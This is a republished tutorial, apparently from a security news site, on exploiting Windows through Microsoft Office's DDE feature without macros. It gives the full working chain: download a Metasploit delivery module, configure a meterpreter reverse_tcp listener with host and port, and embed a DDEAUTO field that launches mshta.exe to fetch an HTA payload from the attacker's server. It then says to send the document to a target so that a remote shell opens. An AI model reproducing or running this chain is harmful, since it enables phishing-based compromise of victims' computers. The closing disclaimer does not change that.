Home security App - Mobile Applications protect security Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

91
0


DDE exploit  - DDE Exploit - Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

also was known as dynamic data exchange, it allows data to be transferred between applications without any interaction from the user. Hackers leveraged this method to execute malicious scripts to compromise.

It was reported to from Sensepost, Etienne Stalmans, and Saif El-Sherei but it was not patched since many applications are using the DDE protocol. This exploit doesn’t require a macro function to be enabled.

Also Read Complete list of Kali Linux Tutorials

Prerequisites – DDE exploit

  • Machine
  • Microsoft Office (Any version)
  • KALI LINUX

We will have to import a Metasploit exploit.

Download it from GitHub by using the command terminal

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Move the script to the Metasploit location

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

- Screen Shot 2017 11 09 at 5 - Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

 

 

 

 

Now type msfconsole in the terminal, which launches the Metasploit framework and type reload_all to load the modules.

- Screen Shot 2017 11 09 at 5 - Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

 

 

 

This exploit uses the dde function to deliver the hta payload. Now type in

use exploit/windows/dde_delivery 
then set the sever host using the following command
set SRVHOST 192.168.177.141

we need to set a payload listener. Don’t use the port 8080 since the server port is set by default to 8080

  1. set PAYLOAD windows/meterpreter/reverse_tcp
  2. set LHOST 192.168.177.141
  3. set LPORT 6708
  4. exploit

- Screen Shot 2017 11 09 at 6 - Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

 

 

 

 

Now copy paste the code into any word document. we used office 365 pro plus, fully updated. locate formula and you should have a small error box in the doc and then right click toggle code. paste the command in the doc between flower brackets. save the document.

{DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

- Screen Shot 2017 11 09 at 6 - Exploiting Windows Using Microsoft Office DDE Exploit (MACROLESS)

 

 

 

Send the document to the suspect and a meterpreter session will open. Take a look at the video

Disclaimer

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and www.gbhackers.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here